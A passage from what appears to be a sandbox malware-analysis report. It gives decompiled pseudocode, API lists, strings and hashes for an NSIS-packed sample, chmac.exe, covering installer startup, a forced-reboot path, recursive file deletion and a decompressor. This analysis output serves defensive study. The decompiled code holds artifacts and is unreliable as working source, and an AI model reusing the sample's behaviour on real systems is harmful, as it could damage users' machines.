				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\hardz\\AppData\\Roaming\\dihsw\\chmac.exe\" ";
				E00405A85(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\hardz\\AppData\\Roaming\\dihsw\\chmac.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004031F1(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035A6();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405DA3(3);
												_t100 = E00405DA3(4);
												_t55 = E00405DA3(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405346(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t103 = E004055A3(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\AppData\\Roaming\\dihsw") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", "C:\\Users\\hardz\\AppData\\Roaming\\dihsw");
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\AppData\\Roaming\\dihsw\\chmac.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004052E5(0x41f050);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004057D3();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E00405659(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004031F1(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

APIs

#17.COMCTL32 ref: 00403244
SetErrorMode.KERNELBASE(00008001), ref: 0040324F
OleInitialize.OLE32(00000000), ref: 00403256

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92

GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 00403293
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,00000000), ref: 004032A6
CharNextA.USER32(00000000,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,00000020), ref: 004032D1
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
DeleteFileA.KERNELBASE(1033), ref: 00403398
OleUninitialize.OLE32(00000000), ref: 00403416
ExitProcess.KERNEL32 ref: 00403436
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,00000000,00000000), ref: 00403442
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming\dihsw,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,00000000,00000000), ref: 0040344E
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
CopyFileA.KERNEL32(C:\Users\user\AppData\Roaming\dihsw\chmac.exe,0041F050,00000001), ref: 004034BF
CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
ExitProcess.KERNEL32 ref: 004035A0

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004033F3
_?=, xrefs: 004033BF
C:\Users\user\AppData\Local\Temp, xrefs: 0040334F, 004033E8, 00403467, 00403470
/D=, xrefs: 00403327
\Temp, xrefs: 0040337F
NSIS Error, xrefs: 00403284
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403235
~nsu.tmp, xrefs: 0040343C
", xrefs: 004032F3
1033, xrefs: 00403393
C:\Users\user\AppData\Roaming\dihsw, xrefs: 00403447, 0040344C, 0040346F
SeShutdownPrivilege, xrefs: 00403553
C:\Users\user\AppData\Local\Temp\, xrefs: 00403359, 0040335E, 00403378, 00403384, 00403441, 0040344D, 00403459, 00403460, 00403500
C:\Users\user\AppData\Roaming\dihsw\chmac.exe, xrefs: 004034BA
NCRC, xrefs: 00403311
"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" , xrefs: 00403299, 0040329F, 004033B5
Error launching installer, xrefs: 004033CE

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\dihsw$C:\Users\user\AppData\Roaming\dihsw\chmac.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2278157092-3285423365
Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004053AA, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

APIs

DeleteFileA.KERNELBASE(?,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,74E5F560), ref: 004053C8
lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,74E5F560), ref: 00405412
lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,74E5F560), ref: 00405433
lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,74E5F560), ref: 00405439
FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,74E5F560), ref: 0040544A
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
FindClose.KERNEL32(?), ref: 0040550D

Strings

\*.*, xrefs: 0040540C
C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" , xrefs: 004053B4

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\AppData\Roaming\dihsw\chmac.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3020306546
Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040604C, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
